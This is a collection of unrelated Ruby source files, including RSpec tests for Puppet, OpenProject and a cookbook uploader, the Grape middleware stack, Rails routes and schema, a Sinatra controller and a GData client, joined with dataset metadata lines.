          Puppet[:node_name_value].should == 'other_node_name'
        end

        it "should merge in our node the loaded facts" do
          @facts.values.merge!('key' => 'value')

          expect { @apply.main }.to exit_with 0

          @node.parameters['key'].should == 'value'
        end

        it "should raise an error if we can't find the facts" do
          Puppet::Node::Facts.indirection.expects(:find).returns(nil)

          lambda { @apply.main }.should raise_error
        end
      end

      describe "with detailed_exitcodes" do
        before :each do
          @apply.options[:detailed_exitcodes] = true
        end

        it "should exit with report's computed exit status" do
          Puppet[:noop] = false
          Puppet::Transaction::Report.any_instance.stubs(:exit_status).returns(666)

          expect { @apply.main }.to exit_with 666
        end

        it "should exit with report's computed exit status, even if --noop is set" do
          Puppet[:noop] = true
          Puppet::Transaction::Report.any_instance.stubs(:exit_status).returns(666)

          expect { @apply.main }.to exit_with 666
        end

        it "should always exit with 0 if option is disabled" do
          Puppet[:noop] = false
          report = stub 'report', :exit_status => 666
          @transaction.stubs(:report).returns(report)

          expect { @apply.main }.to exit_with 0
        end

        it "should always exit with 0 if --noop" do
          Puppet[:noop] = true
          report = stub 'report', :exit_status => 666
          @transaction.stubs(:report).returns(report)

          expect { @apply.main }.to exit_with 0
        end
      end
    end

    describe "the 'apply' command" do
      it "should read the catalog in from disk if a file name is provided" do
        @apply.options[:catalog] = "/my/catalog.pson"

        File.expects(:read).with("/my/catalog.pson").returns "something"

        Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns Puppet::Resource::Catalog.new
        @apply.apply
      end

      it "should read the catalog in from stdin if '-' is provided" do
        @apply.options[:catalog] = "-"
        $stdin.expects(:read).returns "something"

        Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns Puppet::Resource::Catalog.new
        @apply.apply
      end

      it "should deserialize the catalog from the default format" do
        @apply.options[:catalog] = "/my/catalog.pson"
        File.stubs(:read).with("/my/catalog.pson").returns "something"

        Puppet::Resource::Catalog.stubs(:default_format).returns :rot13_piglatin
        Puppet::Resource::Catalog.stubs(:convert_from).with(:rot13_piglatin,'something').returns Puppet::Resource::Catalog.new
        @apply.apply
      end

      it "should fail helpfully if deserializing fails" do
        @apply.options[:catalog] = "/my/catalog.pson"
        File.stubs(:read).with("/my/catalog.pson").returns "something syntacically invalid"

        lambda { @apply.apply }.should raise_error(Puppet::Error)
      end

      it "should convert plain data structures into a catalog if deserialization does not do so" do
        @apply.options[:catalog] = "/my/catalog.pson"
        File.stubs(:read).with("/my/catalog.pson").returns "something"

        Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,"something").returns({:foo => "bar"})
        Puppet::Resource::Catalog.expects(:pson_create).with({:foo => "bar"}).returns(Puppet::Resource::Catalog.new)
        @apply.apply
      end

      it "should convert the catalog to a RAL catalog and use a Configurer instance to apply it" do
        @apply.options[:catalog] = "/my/catalog.pson"
        File.stubs(:read).with("/my/catalog.pson").returns "something"

        catalog = Puppet::Resource::Catalog.new
        Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns catalog

        catalog.expects(:to_ral).returns "mycatalog"

        configurer = stub 'configurer'
        Puppet::Configurer.expects(:new).returns configurer
        configurer.expects(:run).with(:catalog => "mycatalog")

        @apply.apply
      end
    end
  end
end
| 33.982278 | 126 | 0.646204 |
117c62bceae3bc654a4352a9e31d5791ccb1e6d2 | 1,070 | # Copyright 2019 Oath Inc. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
require 'indexed_search_test'
# System test: a query against a non-existent index should be rewritten into
# an implicit phrase, while a query against a real index passes through as-is.
# NOTE(review): the "Implitict" typo in the class name is preserved -- the
# harness may look the test up by class/file name.
class ImplitictIndexPhrase < IndexedSearchTest

  def nightly?
    true
  end

  def setup
    set_owner("arnej")
    set_description("Check implicit phrasing when querying for non-existant index.")
    deploy_app(SearchApp.new.sd(SEARCH_DATA+"music.sd"))
    start
  end

  def test_implicitindexphrase
    feed_and_wait_for_docs("music", 10, :file => SEARCH_DATA+"music.10.xml")

    puts "Query: Querying, checking implicit phrase"
    result = search("query=notanindex:blues&tracelevel=1")
    # The unknown index name is folded into the query as a phrase term.
    # NOTE(review): arguments here are (message, condition); Test::Unit-style
    # assert expects the condition first -- confirm the framework's signature,
    # otherwise these assertions are vacuous (a String is always truthy).
    assert("Result does not contain string:query=[\"notanindex blue\"]",
           result.xmldata.include?("query=[\"notanindex blue\"]"))

    puts "Query: Querying, checking specific index"
    result = search("query=title:nosuchtitle&tracelevel=1")
    # Fixed copy-paste error: the failure message previously referenced the
    # first query's expected string instead of this query's.
    assert("Result does not contain string:query=[title:nosuchtitle]",
           result.xmldata.include?("query=[title:nosuchtitle]"))
  end

  def teardown
    stop
  end

end
| 29.722222 | 111 | 0.71215 |
38cde48ae22ec05b0ed4944701db4eb17b7e06d1 | 530 | require 'bundler'
module NightWatch
  module Utilities
    # Helper for shelling out to external commands in a Bundler-clean env.
    module ScriptRunner
      # Runs +command+ through the shell, echoing what it is doing to stderr.
      #
      # @param command [String] shell command to execute
      # @param return_std_out [Boolean] when false (default), the command's
      #   stdout is redirected to stderr and an empty string is returned;
      #   when true, captured stdout is returned.
      # @raise [RuntimeError] if the command exits with a non-zero status
      def sh(command, return_std_out = false)
        effective = return_std_out ? command.dup : command.dup << ' 1>&2'
        $stderr.puts "run: #{command}"
        $stderr.puts "in: #{`pwd`}"
        captured = Bundler.with_clean_env { `#{effective}` }
        $stderr.puts
        status = $?
        unless status.success?
          raise "Error running command: #{command}\nExit status: #{status.exitstatus}"
        end
        captured
      end
      module_function :sh
    end
  end
end
| 20.384615 | 99 | 0.596226 |
b969e17adacf4d2b39d8a5beab158d09a4e5e1d2 | 4,923 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2017 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Version resource' do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
let(:current_user) do
user = FactoryGirl.create(:user,
member_in_project: project,
member_through_role: role)
allow(User).to receive(:current).and_return user
user
end
let(:role) { FactoryGirl.create(:role, permissions: [:view_work_packages]) }
let(:project) { FactoryGirl.create(:project, is_public: false) }
let(:other_project) { FactoryGirl.create(:project, is_public: false) }
let(:version_in_project) { FactoryGirl.build(:version, project: project) }
let(:version_in_other_project) do
FactoryGirl.build(:version, project: other_project,
sharing: 'system')
end
subject(:response) { last_response }
describe '#get (:id)' do
  let(:get_path) { api_v3_paths.version version_in_project.id }

  shared_examples_for 'successful response' do
    it 'responds with 200' do
      expect(last_response.status).to eq(200)
    end

    it 'returns the version' do
      expect(last_response.body).to be_json_eql('Version'.to_json).at_path('_type')
      expect(last_response.body).to be_json_eql(expected_version.id.to_json).at_path('id')
    end
  end

  context 'logged in user with permissions' do
    before do
      version_in_project.save!
      # Referencing the lazy let forces creation of the member user and the
      # User.current stub before the request is made.
      current_user

      get get_path
    end

    it_should_behave_like 'successful response' do
      let(:expected_version) { version_in_project }
    end
  end

  context 'logged in user with permission on project a version is shared with' do
    # The version lives in another project but is shared system-wide.
    let(:get_path) { api_v3_paths.version version_in_other_project.id }

    before do
      version_in_other_project.save!
      current_user

      get get_path
    end

    it_should_behave_like 'successful response' do
      let(:expected_version) { version_in_other_project }
    end
  end

  context 'logged in user without permission' do
    # Override the role so the membership carries no permissions at all.
    let(:role) { FactoryGirl.create(:role, permissions: []) }

    before(:each) do
      version_in_project.save!
      current_user

      get get_path
    end

    it_behaves_like 'unauthorized access'
  end
end
describe '#get /versions' do
  let(:get_path) { api_v3_paths.versions }
  let(:response) { last_response }
  let(:versions) { [version_in_project] }

  before do
    versions.map(&:save!)
    current_user

    get get_path
  end

  it 'succeeds' do
    expect(last_response.status)
      .to eql(200)
  end

  it_behaves_like 'API V3 collection response', 1, 1, 'Version'

  it 'is the version the user has permission in' do
    expect(response.body)
      .to be_json_eql(api_v3_paths.version(version_in_project.id).to_json)
      .at_path('_embedded/elements/0/_links/self/href')
  end

  context 'filtering for project by sharing' do
    let(:shared_version_in_project) do
      FactoryGirl.build(:version, project: project, sharing: 'system')
    end
    # Two versions exist, but the sharing filter below should keep only one.
    let(:versions) { [version_in_project, shared_version_in_project] }

    let(:filter_query) do
      [{ sharing: { operator: '=', values: ['system'] } }]
    end

    let(:get_path) do
      "#{api_v3_paths.versions}?filters=#{CGI.escape(JSON.dump(filter_query))}"
    end

    it_behaves_like 'API V3 collection response', 1, 1, 'Version'

    it 'returns the shared version' do
      expect(response.body)
        .to be_json_eql(api_v3_paths.version(shared_version_in_project.id).to_json)
        .at_path('_embedded/elements/0/_links/self/href')
    end
  end
end
end
| 30.57764 | 92 | 0.680479 |
abfbdaa45fc015ad9f42c324ed877e5e94880697 | 2,870 | module Grape
module Middleware
# Class to handle the stack of middlewares based on ActionDispatch::MiddlewareStack
# It allows to insert and insert after
class Stack
  # Value object describing one middleware entry: its class, the extra
  # constructor arguments and an optional block.
  class Middleware
    attr_reader :args, :block, :klass

    def initialize(klass, *args, &block)
      @klass = klass
      @args = args
      @block = block
    end

    def name
      klass.name
    end

    # Equality against another Middleware (same class) or a bare Class.
    # The superclass check lets anonymous subclasses match their parent.
    def ==(other)
      case other
      when Middleware
        klass == other.klass
      when Class
        klass == other || (name.nil? && klass.superclass == other)
      end
    end

    def inspect
      klass.to_s
    end
  end

  include Enumerable

  attr_accessor :middlewares, :others

  def initialize
    @middlewares = []
    @others = []
  end

  def each
    @middlewares.each { |x| yield x }
  end

  def size
    middlewares.size
  end

  def last
    middlewares.last
  end

  def [](i)
    middlewares[i]
  end

  # Inserts a middleware before +index+ (an Integer or a matching entry).
  def insert(index, *args, &block)
    index = assert_index(index, :before)
    middleware = self.class::Middleware.new(*args, &block)
    middlewares.insert(index, middleware)
  end

  alias insert_before insert

  def insert_after(index, *args, &block)
    index = assert_index(index, :after)
    insert(index + 1, *args, &block)
  end

  # Appends a middleware to the end of the stack.
  def use(*args, &block)
    middleware = self.class::Middleware.new(*args, &block)
    middlewares.push(middleware)
  end

  # Replays stored middleware specs (e.g. [:use, Klass, arg, proc]) onto self.
  def merge_with(middleware_specs)
    middleware_specs.each do |operation, *args|
      if args.last.is_a?(Proc)
        # Pop the proc into a local BEFORE the call. The previous
        # `public_send(operation, *args, &args.pop)` expanded the splat
        # before #pop executed, so the proc was also passed as a positional
        # argument and ended up inside Middleware#args.
        last_proc = args.pop
        public_send(operation, *args, &last_proc)
      else
        public_send(operation, *args)
      end
    end
  end

  # @return [Rack::Builder] the builder object with our middlewares applied
  def build(builder = Rack::Builder.new)
    # Drain any pending specs queued by #concat before materializing.
    others.shift(others.size).each(&method(:merge_with))
    middlewares.each do |m|
      m.block ? builder.use(m.klass, *m.args, &m.block) : builder.use(m.klass, *m.args)
    end
    builder
  end

  # @description Add middlewares with :use operation to the stack. Store others with :insert_* operation for later
  # @param [Array] other_specs An array of middleware specifications (e.g. [[:use, klass], [:insert_before, *args]])
  def concat(other_specs)
    @others << Array(other_specs).reject { |o| o.first == :use }
    merge_with(Array(other_specs).select { |o| o.first == :use })
  end

  protected

  # Resolves +index+ to an Integer position, raising when no entry matches.
  def assert_index(index, where)
    i = index.is_a?(Integer) ? index : middlewares.index(index)
    i || raise("No such middleware to insert #{where}: #{index.inspect}")
  end
end
end
end
| 25.855856 | 120 | 0.573519 |
1d23457e9ae31036e8cf92ede356d9d7f4244426 | 64 | module GoogleFinance
# Base class for Google Finance API resources.
# NOTE(review): behavior comes entirely from Hashie::Trash (a Dash with key
# translation); this subclass exists as a marker type / extension point.
class Resource < Hashie::Trash
end
end
| 12.8 | 32 | 0.765625 |
91a681e8038c6e8a50413a7b403e675ae1192755 | 3,706 | # Copyright (c) 2012 RightScale, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# 'Software'), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'yard'
module YARD::CodeObjects
  module Chef
    # A ChefObject is an abstract implementation of all chef elements
    # (cookbooks, resources, providers, recipes, attributes and actions).
    #
    class ChefObject < YARD::CodeObjects::ClassObject
      # Returns the formatting type of docstring (Example: :markdown, :rdoc).
      #
      # @return [Symbol, String] formatting type
      #
      attr_reader :docstring_type

      # Creates a new ChefObject object.
      #
      # @param namespace [NamespaceObject] namespace to which the object belongs
      # @param name [String] name of the ChefObject
      #
      # @return [ChefObject] the newly created ChefObject
      #
      def initialize(namespace, name)
        super(namespace, name)
        @docstring_type = :markdown
      end

      # Register a chef element class.
      #
      # @param element [Class] chef element class
      #
      def self.register_element(element)
        # Class variable on purpose: the registry is shared across every
        # ChefObject subclass so .register can look elements up by type.
        @@chef_elements ||= {}
        @@chef_elements[element] = self
      end

      # Factory for creating and registering chef element object in
      # YARD::Registry.
      #
      # @param namespace [NamespaceObject] namespace to which the object must
      # belong
      # @param name [String] name of the chef element
      # @param type [Symbol, String] type of the chef element
      #
      # @return [<type>Object] the element object
      #
      def self.register(namespace, name, type)
        element = @@chef_elements[type]
        if element
          # Reuse an already-registered object when one exists, so each
          # namespace/name pair maps to exactly one registry entry.
          element_obj = YARD::Registry.resolve(:root, "#{namespace}::#{name}")
          if element_obj.nil?
            element_obj = element.new(namespace, name)
            log.info "Created [#{type.to_s.capitalize}]" +
              " #{element_obj.name} => #{element_obj.namespace}"
          end
          element_obj
        else
          raise "Invalid chef element type #{type}"
        end
      end

      # Returns children of an object of a particular type.
      #
      # @param type [Symbol] type of ChefObject to be selected
      #
      # @return [Array<ChefObject>] list of ChefObjects
      #
      def children_by_type(type)
        children = YARD::Registry.all(type)
        children.reject { |child| child.parent != self }
      end

      # Gets all Chef cookbooks.
      #
      # @return [Array<CookbookObject>] list of cookbooks.
      #
      def cookbooks
        children_by_type(:cookbook)
      end
    end

    # Register 'Chef' as the root namespace
    CHEF = ChefObject.new(:root, 'chef')
    log.info "Creating [Chef] as 'root' namespace"
  end
end
| 34.314815 | 80 | 0.658662 |
622cf23f86caa13fe5e1f13363c2e843a8d97f4f | 774 | $:.push File.expand_path("../lib", __FILE__)
require "backtrail/version"
# Gem packaging manifest for backtrail.
Gem::Specification.new do |spec|
  spec.name    = "backtrail"
  spec.version = Backtrail::VERSION
  spec.license = "MIT"

  spec.authors  = ["Daniel Ferraz"]
  spec.email    = ["[email protected]"]
  spec.homepage = "https://github.com/dferrazm/backtrail"

  spec.summary     = "Keep a trail of request paths for your Rails application"
  spec.description = "Keep a trail of request paths for your Rails application"

  # Package everything tracked by git; expose bin/ scripts as executables.
  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_dependency 'railties', '>= 4.0'
  spec.add_development_dependency 'mocha'
end
| 33.652174 | 76 | 0.640827 |
793a2864310f546ebf5bf2ad2f5c41717dd480a8 | 792 | class UsersController < ApplicationController
# GET /signup -- show the signup form; already-signed-in users go to /ideas.
get '/signup' do
  if !logged_in?
    erb :'users/signup'
  else
    flash[:message] = "Signed in as #{current_user.username}."
    redirect to '/ideas'
  end
end

# POST /signup -- create the account and log the new user in via the session.
post '/signup' do
  @user = User.new(username: params[:username], password: params[:password])
  if @user.save
    session[:user_id] = @user.id
    redirect to '/ideas'
  else
    # NOTE(review): this writes flash[:messages] (plural) while the GET above
    # writes flash[:message] -- confirm which key the views actually read.
    flash[:messages] = @user.errors.full_messages
    redirect to '/signup'
  end
end

# GET /users -- list all users.
get '/users' do
  @users = User.all
  erb :'users/index'
end

# GET /users/:slug -- show a single user looked up by URL slug.
get '/users/:slug' do
  @user = User.find_by_slug(params[:slug])
  erb :'users/show'
end
end
| 23.294118 | 82 | 0.527778 |
5df4fd3e1779aee16086c7b73f93fcbc1840d337 | 1,085 | StartUp::Application.routes.draw do
# Blog posts with nested comments.
resources :posts do
  resources :comments
end

# Admin dashboard root (admin/home#index).
namespace :admin do
  root :to => 'home#index'
end

# Mounted engines: RailsAdmin backend and the UEditor rich-text editor.
mount RailsAdmin::Engine => '/rails_admin', :as => 'rails_admin'
match 'district/:id' => 'district#show'
mount UeditorRails::Engine => '/ueditor'
# UEditor asset-upload endpoints.
post 'ueditor/file', :to => 'ueditor/assets#file'
post 'ueditor/image', :to => 'ueditor/assets#image'

# User friendly exception handling
match '/404', :to => 'errors#not_found'
match '/500', :to => 'errors#error_occurred'

# Devise with custom OmniAuth/registration controllers, plus extra routes for
# cancelling an OmniAuth flow and binding an external account to a profile.
devise_for :users, :controllers => { :omniauth_callbacks => 'users/omniauth_callbacks',
                                     :registrations => 'users/registrations'} do
  namespace :users do
    match 'auth/:action/cancel', :to => 'omniauth_cancel_callbacks#:action', :as => 'cancel_omniauth_callback'
    get 'binding', :to => 'registrations#binding'
    post 'binding', :to => 'registrations#bind'
    put 'profile', :to => 'profiles#update'
  end
end

get 'profiles/:id' => 'users/profiles#show'
root :to => 'home#index'
end
| 31 | 112 | 0.639631 |
18673e21119ed958a9e9c6fe22b801a85ac5b4e6 | 4,354 | # frozen_string_literal: true
require File.expand_path("#{File.dirname(__FILE__)}/../../spec_helper")
describe Vk::Wall do
# Sanity checks on the Wall model's attributes, associations and validations.
describe 'Basic' do
  before :each do
    @wall = FactoryBot.create(:wall, id: 1, domain: '1')
  end

  it 'should provide needed attributes' do
    # Database fields
    expect(@wall).to respond_to(:id, :domain, :last_message_id)
    # Relations
    expect(@wall).to respond_to(:cwlinks, :chats)
  end

  it 'should raise if domain is already taken' do
    # Domain already taken exception
    expect { FactoryBot.create(:wall, id: 3, domain: '1') }
      .to raise_error(ActiveRecord::RecordInvalid)
  end
end
describe 'Simple utils' do
before :each do
@wall1 = FactoryBot.create(:wall, id: 1, domain: 'club1')
@wall2 = FactoryBot.create(:wall, id: 2, domain: 'club2z')
@wall3 = FactoryBot.create(:wall, id: 3, domain: 'noclub15')
@wall4 = FactoryBot.create(:wall, id: 4, domain: 'noclubatall')
@wall5 = FactoryBot.create(:wall, id: 5, domain: 'club1554757')
end
it 'should define if wall is watched' do
chat1 = FactoryBot.create(:chat, id: 1, enabled: false)
FactoryBot.create(:cwlink, wall: @wall1, chat: chat1)
# disabled chats should be ignored
expect(@wall1.watched?).to be false
chat1.update_attribute(:enabled, true)
# enabled chat should be counted
expect(@wall1.reload.watched?).to be true
expect(@wall2.watched?).to be false
end
it 'should detect owner_id' do
expect(@wall1.owner_id).to eq '-1'
expect(@wall2.owner_id).to eq '0'
expect(@wall3.owner_id).to eq '0'
expect(@wall4.owner_id).to eq '0'
expect(@wall5.owner_id).to eq '-1554757'
end
end
describe 'Wall processing' do
  before :each do
    @wall = FactoryBot.create(
      :wall,
      id: 1, domain: 'test', last_message_id: 0
    )
    FactoryBot.create(:token, id: 1, key: 'nope')

    # Serve a canned wall.get payload instead of hitting the real VK API.
    fn = 'vk_informer_wall_spec/wall.get.1.json'
    @stub = stub_request(:post, 'https://api.vk.com/method/wall.get')
            .to_return(
              body: File.read("#{File.dirname(__FILE__)}/../../fixtures/#{fn}")
            )
  end

  after :each do
    remove_request_stub(@stub)
  end

  it 'should process only new messages' do
    # Only posts with an id above last_message_id count as new.
    expect(@wall.__send__(:new_messages).size).to eq 5
    @wall.update_attribute(:last_message_id, 18_023)
    expect(@wall.__send__(:new_messages).size).to eq 0
    @wall.update_attribute(:last_message_id, 17_985)
    expect(@wall.__send__(:new_messages).size).to eq 3
  end

  it 'should not process unwatched walls' do
    expect_any_instance_of(Vk::Wall).not_to receive(:process)
    Vk::Wall.process
  end

  it 'should disable private walls' do
    chat = FactoryBot.create(:chat, id: 1, enabled: false)
    # A members-only wall raises through http_load; the wall must then be
    # detached from its chats instead of failing on every poll.
    allow(@wall)
      .to receive(:http_load)
      .and_raise(Faraday::Error.new('Access denied: this wall available only for community members'))

    chat.walls << @wall
    expect(chat.reload.walls.size).to eq 1
    expect(@wall.__send__(:new_messages)).to eq []
    expect(chat.reload.walls.size).to eq 0
  end
end
describe 'Generate keyboard buttons' do
before(:each) do
@wall = FactoryBot.create(:wall, id: 1, domain: 'domain1')
end
it 'should prepare hash for /list command' do
row = @wall.keyboard_list
expect(row.length).to eq 1
expect(row).to be_instance_of(Array)
row.each do |button|
expect(button).to be_instance_of(Hash)
expect(button).to have_key(:text)
end
expect(row.first).to have_key(:url)
expect(row.first[:url]).to eq 'https://vk.com/domain1'
end
it 'should prepare hash for /delete command' do
row = @wall.keyboard_delete
expect(row.length).to eq 1
expect(row).to be_instance_of(Array)
row.each do |button|
expect(button).to be_instance_of(Hash)
expect(button).to have_key(:text)
end
expect(row.first).to have_key(:callback_data)
cd = nil
expect { cd = JSON.parse(row.first[:callback_data], symbolize_names: true) }.not_to raise_error
expect(cd).to be_instance_of(Hash)
expect(cd[:action]).to eq 'delete domain1'
expect(cd[:update]).to be true
end
end
end
| 29.221477 | 103 | 0.634589 |
5d4af6b56e01ae7ca91f9fa846c88c51ffcf89a8 | 67 | module Capybara
module Mechanize
  # Gem version string, consumed by the gemspec.
  VERSION = '1.1.0'
end
end
| 11.166667 | 21 | 0.671642 |
e87e33fa4e17d50a6fe3b9badc45bb66f0621cc6 | 792 | module Intrigue
module Ident
  module SshCheck
    # Fingerprint check for the Dropbear SSH server, matched against the SSH
    # protocol banner (e.g. "SSH-2.0-dropbear_2016.74").
    class Dropbear < Intrigue::Ident::SshCheck::Base
      def generate_checks
        [
          { # SSH-2.0-dropbear_2016.74
            :type => "fingerprint",
            :category => "application",
            :tags => ["SSHServer"],
            :vendor => "Dropbear SSH Project",
            :product => "Dropbear SSH",
            :references => [],
            :version => nil,
            :match_type => :content_banner,
            :match_content => /dropbear/i,
            # Extracts the version number from the banner when present.
            :dynamic_version => lambda { |x| _first_banner_capture(x, /^SSH-2.0-dropbear_([\d\.]+)\r\n$/i)},
            :match_details => "banner",
            :hide => false,
            :inference => true
          }
        ]
      end
    end
  end
end
end
| 28.285714 | 108 | 0.489899 |
bb0a63f0fa2f609e41e5878b02409456a4c555f5 | 1,597 | require 'net/http'
require 'net/https'
require 'uri'
require 'rubygems'
require 'hpricot'
#
# Net::HTTP subclass with TLS enabled at construction time, so the
# class-level convenience helpers (e.g. post_form) also work over https.
#
module Net
  class HTTPS < HTTP
    def initialize(address, port = nil)
      super
      self.use_ssl = true
    end
  end
end
module GData
  # ClientLogin endpoint (Google's long-deprecated username/password auth).
  GOOGLE_LOGIN_URL = URI.parse('https://www.google.com/accounts/ClientLogin')

  # Minimal HTTP client for Google GData services using ClientLogin auth.
  class Base
    attr_reader :service, :source, :url

    # @param service [String] GData service code (e.g. 'cl')
    # @param source  [String] application identifier sent to Google
    # @param url     [String] host name used for all subsequent API requests
    def initialize(service, source, url)
      @service = service
      @source = source
      @url = url
    end

    # Exchanges credentials for a ClientLogin token and caches the request
    # headers used by #get/#post/#put. Raises via Net::HTTPResponse#error!
    # when login fails.
    # NOTE(review): `$VERBOSE = nil` silences Ruby warnings process-wide;
    # preserved as-is, but it is a surprising global side effect.
    def authenticate(email, password)
      $VERBOSE = nil
      response = Net::HTTPS.post_form(GOOGLE_LOGIN_URL,
                                      {'Email' => email,
                                       'Passwd' => password,
                                       'source' => source,
                                       'service' => service })
      response.error! unless response.kind_of? Net::HTTPSuccess
      @headers = {
        'Authorization' => "GoogleLogin auth=#{response.body.split(/=/).last}",
        'GData-Version' => '2',
        'Content-Type' => 'application/atom+xml'
      }
    end

    # Returns only the data portion of #get.
    # NOTE(review): on modern Rubies Net::HTTP#get returns a single response
    # object, so `data` is nil here; the pair destructuring dates from 1.8.
    def request(path)
      response, data = get(path)
      data
    end

    def get(path)
      response, data = http.get(path, @headers)
    end

    def post(path, entry)
      ret = http.post(path, entry, @headers)
    end

    # Issues a PUT as a POST with the X-HTTP-Method-Override header set.
    # Fixed: build a merged copy of the headers instead of mutating @headers,
    # which previously leaked the override header into every later request.
    def put(path, entry)
      http.put(path, entry, @headers.merge('X-HTTP-Method-Override' => 'PUT'))
    end

    # Fresh plain-HTTP connection to the configured host.
    def http
      conn = Net::HTTP.new(url, 80)
      #conn.set_debug_output $stderr
      conn
    end
  end
end
| 20.74026 | 84 | 0.595492 |
6a91d5fc11e8cba3d5ceb4633c5c3f6f5244946b | 2,118 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20180903203629) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

  # Candidate answers for a question; the four integer columns (named after
  # the houses) presumably hold the points an answer contributes to each.
  create_table "answers", force: :cascade do |t|
    t.string "text", null: false
    t.integer "gryffindor", null: false
    t.integer "ravenclaw", null: false
    t.integer "hufflepuff", null: false
    t.integer "slytherin", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
    t.integer "question_id", null: false
  end

  create_table "questions", force: :cascade do |t|
    t.string "text", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

  # Join table recording which answer a quiz selected for each question.
  create_table "quiz_questions", force: :cascade do |t|
    t.integer "quiz_id", null: false
    t.integer "question_id", null: false
    t.integer "answer_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

  create_table "quizzes", force: :cascade do |t|
    t.integer "user_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

  create_table "users", force: :cascade do |t|
    t.string "name", null: false
    t.string "email", null: false
    t.string "house_choice", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end
end
| 36.517241 | 86 | 0.720491 |
7ac8defef34532b92fdb65a6a8c92eddd55a6e6b | 12,317 | require "and_feathers"
require "and_feathers/gzipped_tarball"
require "spec_helper"
require "tempfile"
describe CookbookUpload do
describe "#finish(user)" do
before do
create(:category, name: "Other")
end
let(:cookbook) do
JSON.dump("category" => "Other")
end
let(:user) do
create(:user)
end
it "creates a new cookbook if the given name is original and assigns it to a user" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
expect do
upload.finish
end.to change(user.owned_cookbooks, :count).by(1)
end
it "doesn't change the owner if a collaborator uploads a new version" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_one).finish
collaborator = create(:user)
CookbookUpload.new(collaborator, cookbook: cookbook, tarball: tarball_two).finish do |_, result|
expect(result.owner).to eql(user)
expect(result.owner).to_not eql(collaborator)
end
end
it "updates the existing cookbook if the given name is a duplicate" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_one).finish
update = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_two)
expect do
update.finish
end.to_not change(Cookbook, :count)
end
it "creates a new version of the cookbook if the given name is a duplicate" do
tarball_one = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
tarball_two = File.open("spec/support/cookbook_fixtures/redis-test-v2.tgz")
cookbook_record = CookbookUpload.new(
user,
cookbook: cookbook,
tarball: tarball_one
).finish do |_, result|
result
end
update = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball_two)
expect do
update.finish
end.to change(cookbook_record.cookbook_versions, :count).by(1)
end
it "yields empty errors if the cookbook and tarball are workable" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to be_empty
end
context "privacy" do
after { ENV["ENFORCE_PRIVACY"] = nil }
it "returns an error if privacy is being enforced and a private cookbook is uploaded" do
